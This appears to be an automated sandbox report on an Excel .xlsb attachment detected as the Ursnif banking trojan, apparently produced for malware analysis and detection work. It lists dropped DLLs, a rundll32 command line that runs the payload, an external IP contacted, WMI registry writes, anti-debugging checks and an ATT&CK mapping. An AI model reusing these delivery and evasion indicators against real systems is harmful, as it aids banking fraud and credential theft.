      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://tasks.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownHTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      E-Banking Fraud:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      System Summary:

      barindex
      Office process drops PE fileShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to dropped file
      Writes registry values via WMIShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC41AD1 NtMapViewOfSection,2_2_6FC41AD1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC41C22 GetProcAddress,NtCreateSection,memset,2_2_6FC41C22
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC423C5 NtQueryVirtualMemory,2_2_6FC423C5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A17925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_00A17925
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1B169 NtQueryVirtualMemory,2_2_00A1B169
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC421A42_2_6FC421A4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A140B32_2_00A140B3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1AF442_2_00A1AF44
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC68FAA2_2_6FC68FAA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6AF742_2_6FC6AF74
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC65A1A2_2_6FC65A1A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC72D212_2_6FC72D21
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC70C892_2_6FC70C89
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC724BC2_2_6FC724BC
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@6/10@4/3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_00A1229C
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{8D47CC7A-5DAB-4020-89AB-89D27B6C21E5} - OProcSessId.datJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServerJump to behavior
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Attached_File_898318.xlsbInitial sample: OLE zip file path = docProps/thumbnail.wmf
      Source: Attached_File_898318.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: Attached_File_898318.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC42140 push ecx; ret 2_2_6FC42149
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC42193 push ecx; ret 2_2_6FC421A3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1E6BE push esp; retf 2_2_00A1E6BF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1AC00 push ecx; ret 2_2_00A1AC09
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1E1AF push ebx; ret 2_2_00A1E1B2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1AF33 push ecx; ret 2_2_00A1AF43
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A1E163 push edx; iretd 2_2_00A1E164
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC50B9B push ecx; iretd 2_2_6FC50BD9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC54B10 push ebx; retf 2_2_6FC54B4B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC54B38 push ebx; retf 2_2_6FC54B4B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC692D5 push ecx; ret 2_2_6FC692E8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC54E84 push 8D039560h; retf 2_2_6FC54EBE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC56A7E push ebx; ret 2_2_6FC56A9A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC56A03 push eax; ret 2_2_6FC56A06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC56197 push esp; iretd 2_2_6FC5619E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC569A7 push edi; ret 2_2_6FC569B4
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-13193
      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-11935
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00A17DD8
      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_2-13195

      Anti Debugging:

      barindex
      Found API chain indicative of debugger detectionShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_2-12784
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6DF2F _memset,IsDebuggerPresent,2_2_6FC6DF2F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6E881 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,2_2_6FC6E881
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC88303 mov eax, dword ptr fs:[00000030h]2_2_6FC88303
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC87E40 push dword ptr fs:[00000030h]2_2_6FC87E40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC88239 mov eax, dword ptr fs:[00000030h]2_2_6FC88239
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6950C GetProcessHeap,2_2_6FC6950C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC6DC66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6FC6DC66
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A18B98 cpuid 2_2_00A18B98
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,2_2_6FC41B13
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC41000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,2_2_6FC41000
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A18B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_00A18B98
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6FC4166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_6FC4166F

      Stealing of Sensitive Information:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsNative API2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery13Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution4Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery34Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET